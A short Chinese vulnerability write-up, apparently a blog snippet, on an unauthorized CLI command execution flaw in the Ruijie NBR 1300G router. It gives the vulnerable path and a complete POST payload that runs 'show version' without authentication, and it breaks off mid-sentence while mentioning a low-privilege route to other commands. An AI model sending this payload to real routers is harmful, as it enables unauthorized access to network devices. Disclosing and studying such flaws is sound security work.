1300g专题

锐捷NBR 1300G路由器 越权CLI命令执行漏洞

执行查看版本的命令不需要其它权限, 访问url: /WEB_VMS/LEVEL15/ 构造payload数据包: POST /WEB_VMS/LEVEL15/ HTTP/1.1command=show version&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. 回显如下: 测试发现执行其他命令需要权限,查看手册发现存在低权